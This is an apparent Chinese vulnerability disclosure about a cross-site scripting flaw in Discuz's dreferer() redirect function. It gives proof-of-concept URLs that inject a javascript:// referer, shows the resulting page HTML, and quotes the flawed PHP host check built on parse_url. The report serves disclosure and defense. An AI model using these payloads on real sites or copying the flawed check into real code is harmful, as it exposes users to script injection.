### 简要描述:
某函数缺陷导致的 XSS。
### 详细说明:
member.php?mod=logging&action=login&referer=javascript://www.discuz.net/
```
<p>欢迎您回来,Newbie xx,现在将转入登录前页面<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>
<p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转,请点击此链接</a></p>
```
connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/
```
<p>抱歉,当前存在网络问题或服务器繁忙,详细错误:connect_error_code_0,错误代码:<a target=_blank href="http://wiki.opensns.qq.com/wiki/%E3%80%90QQ%E7%99%BB%E5%BD%95%E3%80%91%E5%85%AC%E5%85%B1%E8%BF%94%E5%9B%9E%E7%A0%81%E8%AF%B4%E6%98%8E">openId signature invalid</a>,请您稍候再试。谢谢。<script type="text/javascript" reload="1">setTimeout("window.location.href ='javascript://www.discuz.net/';", 2000);</script></p>
<p class="alert_btnleft"><a href="javascript://www.discuz.net/">如果您的浏览器没有自动跳转,请点击此链接</a></p>
```
source/function/function_core.php:
```
function dreferer($default = '') {
......
if(strpos($_G['referer'], 'member.php?mod=logging')) {
$_G['referer'] = $default;
}
$reurl = parse_url($_G['referer']);
if(!empty($reurl['host']) && !in_array($reurl['host'], array($_SERVER['HTTP_HOST'], 'www.'.$_SERVER['HTTP_HOST'])) && !in_array($_SERVER['HTTP_HOST'], array($reurl['host'], 'www.'.$reurl['host']))) {
if(!in_array($reurl['host'], $_G['setting']['domain']['app']) && !isset($_G['setting']['domain']['list'][$reurl['host']])) {
$domainroot = substr($reurl['host'], strpos($reurl['host'], '.')+1);
if(empty($_G['setting']['domain']['root']) || (is_array($_G['setting']['domain']['root']) && !in_array($domainroot, $_G['setting']['domain']['root']))) {
$_G['referer'] = $_G['setting']['domain']['defaultindex'] ? $_G['setting']['domain']['defaultindex'] : 'index.php';
}
}
} elseif(empty($reurl['host'])) {
$_G['referer'] = $_G['siteurl'].'./'.$_G['referer'];
}
$_G['referer'] = durlencode($_G['referer']);
return$_G['referer'];
}
```
这段代码使用 parse_url 解析 referer 后得到的 host 与 $_SERVER['HTTP_HOST'] 进行对比判断是否为站内,但由于这个函数本身是不做有效性检测的,所以使用 js URI 就可以绕过域检测执行 JS了。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/0612150511445998c695ba3944b540af80f37efc.png)
京公网安备 11010502034610号
暂无评论